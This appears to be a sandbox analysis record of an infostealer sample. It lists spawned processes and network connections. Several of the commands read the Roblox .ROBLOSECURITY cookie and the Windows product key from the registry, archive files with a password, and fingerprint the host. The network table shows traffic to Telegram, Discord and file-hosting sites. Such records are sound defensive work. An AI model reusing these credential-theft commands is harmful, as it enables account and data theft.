C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ok2zjqhz\ok2zjqhz.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A42.tmp" "c:\Users\Admin\AppData\Local\Temp\ok2zjqhz\CSCF0F5483F8714796B65745FEDDFB3D9B.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31282\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\otmBs.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI31282\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI31282\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\otmBs.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\AppData\Local\Temp\bound.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2404_133633185876483377\loader.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
main.exe
C:\Users\Admin\AppData\Local\Temp\onefile_3100_133633185880235060\main.exe
main.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdb08fab58,0x7ffdb08fab68,0x7ffdb08fab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4304 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4312 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4692 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4544 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4904 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4280 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3172 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3124 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4340 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5244 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5608 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x300 0x50c
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5760 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5960 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6176 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6296 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6312 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6152 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6324 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6436 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6664 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=7080 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7260 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5756 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=2772 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7744 --field-trial-handle=1924,i,12288019671423761553,7809569983577093174,131072 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-zvxhr.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-f6m2d.in | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | blank-bcwxt.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | api64.ipify.org | udp |
| US | 173.231.16.77:443 | api64.ipify.org | tcp |
| US | 8.8.8.8:53 | auth.boostup.cc | udp |
| US | 172.67.180.126:443 | auth.boostup.cc | tcp |
| US | 8.8.8.8:53 | 77.16.231.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-oolqs.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 107.116.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.179.238:443 | play.google.com | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.238:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gigafile.nu | udp |
| JP | 113.149.253.58:443 | gigafile.nu | tcp |
| JP | 113.149.253.58:443 | gigafile.nu | tcp |
| JP | 113.149.253.58:443 | gigafile.nu | tcp |
| US | 8.8.8.8:53 | 58.253.149.113.in-addr.arpa | udp |
| US | 8.8.8.8:53 | src.gigafile.nu | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | anymind360.com | udp |
| US | 151.101.65.55:443 | anymind360.com | tcp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.179.226:443 | www.googletagservices.com | tcp |
| JP | 211.15.199.166:443 | src.gigafile.nu | tcp |
| JP | 211.15.199.166:443 | src.gigafile.nu | tcp |
| JP | 211.15.199.166:443 | src.gigafile.nu | tcp |
| JP | 211.15.199.166:443 | src.gigafile.nu | tcp |
| JP | 211.15.199.166:443 | src.gigafile.nu | tcp |
| JP | 211.15.199.166:443 | src.gigafile.nu | tcp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.65.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.194.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.199.15.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | flux-cdn.com | udp |
| US | 8.8.8.8:53 | prod.video.anymanager.io | udp |
| US | 8.8.8.8:53 | cpt.geniee.jp | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | delivery.adrecover.com | udp |
| US | 8.8.8.8:53 | platform.twitter.com | udp |
| FR | 18.164.52.121:443 | flux-cdn.com | tcp |
| JP | 133.186.12.51:443 | cpt.geniee.jp | tcp |
| GB | 142.250.178.14:443 | www.youtube.com | tcp |
| US | 152.199.21.70:443 | delivery.adrecover.com | tcp |
| PL | 93.184.220.66:443 | platform.twitter.com | tcp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 151.101.194.133:443 | prod.video.anymanager.io | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 18.245.194.122:443 | c.amazon-adsystem.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| FR | 52.84.174.40:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 151.101.65.55:443 | anymind360.com | udp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| JP | 133.186.12.51:443 | cpt.geniee.jp | tcp |
| GB | 142.250.187.202:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.213.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | script.4dex.io | udp |
| US | 8.8.8.8:53 | syndication.twitter.com | udp |
| GB | 142.250.179.246:443 | i.ytimg.com | tcp |
| US | 18.245.175.156:443 | aax.amazon-adsystem.com | tcp |
| US | 104.26.9.169:443 | script.4dex.io | tcp |
| US | 104.244.42.200:443 | syndication.twitter.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | d.socdm.com | udp |
| US | 8.8.8.8:53 | sp.gmossp-sp.jp | udp |
| US | 8.8.8.8:53 | targeting.unrulymedia.com | udp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| US | 8.8.8.8:53 | pb.ladsp.com | udp |
| JP | 124.146.153.164:443 | d.socdm.com | tcp |
| JP | 124.146.153.164:443 | d.socdm.com | tcp |
| JP | 124.146.153.164:443 | d.socdm.com | tcp |
| JP | 124.146.153.164:443 | d.socdm.com | tcp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| US | 35.201.98.24:443 | sp.gmossp-sp.jp | tcp |
| US | 35.201.98.24:443 | sp.gmossp-sp.jp | tcp |
| JP | 3.115.205.1:443 | pb.ladsp.com | tcp |
| JP | 3.115.205.1:443 | pb.ladsp.com | tcp |
| JP | 3.115.205.1:443 | pb.ladsp.com | tcp |
| JP | 3.115.205.1:443 | pb.ladsp.com | tcp |
| JP | 3.115.205.1:443 | pb.ladsp.com | tcp |
| JP | 3.115.205.1:443 | pb.ladsp.com | tcp |
| US | 8.8.8.8:53 | rtb-jp.mediago.io | udp |
| US | 8.8.8.8:53 | ad.as.amanad.adtdp.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 8.8.8.8:53 | prebid-asia.creativecdn.com | udp |
| US | 8.8.8.8:53 | s-rtb-pb.send.microad.jp | udp |
| US | 8.8.8.8:53 | y.one.impact-ad.jp | udp |
| US | 8.8.8.8:53 | shb.richaudience.com | udp |
| US | 8.8.8.8:53 | mp.4dex.io | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| JP | 35.213.115.3:443 | rtb-jp.mediago.io | tcp |
| FR | 52.222.201.35:443 | ad.as.amanad.adtdp.com | tcp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| SG | 103.132.192.30:443 | prebid-asia.creativecdn.com | tcp |
| JP | 35.213.109.249:443 | y.one.impact-ad.jp | tcp |
| JP | 35.213.109.249:443 | y.one.impact-ad.jp | tcp |
| JP | 35.213.109.249:443 | y.one.impact-ad.jp | tcp |
| JP | 35.213.109.249:443 | y.one.impact-ad.jp | tcp |
| JP | 35.213.109.249:443 | y.one.impact-ad.jp | tcp |
| JP | 35.213.109.249:443 | y.one.impact-ad.jp | tcp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| DE | 157.90.0.38:443 | shb.richaudience.com | tcp |
| DE | 157.90.0.38:443 | shb.richaudience.com | tcp |
| DE | 157.90.0.38:443 | shb.richaudience.com | tcp |
| DE | 157.90.0.38:443 | shb.richaudience.com | tcp |
| DE | 157.90.0.38:443 | shb.richaudience.com | tcp |
| DE | 157.90.0.38:443 | shb.richaudience.com | tcp |
| JP | 202.233.84.2:443 | s-rtb-pb.send.microad.jp | tcp |
| JP | 202.233.84.2:443 | s-rtb-pb.send.microad.jp | tcp |
| JP | 202.233.84.2:443 | s-rtb-pb.send.microad.jp | tcp |
| JP | 202.233.84.2:443 | s-rtb-pb.send.microad.jp | tcp |
| JP | 202.233.84.2:443 | s-rtb-pb.send.microad.jp | tcp |
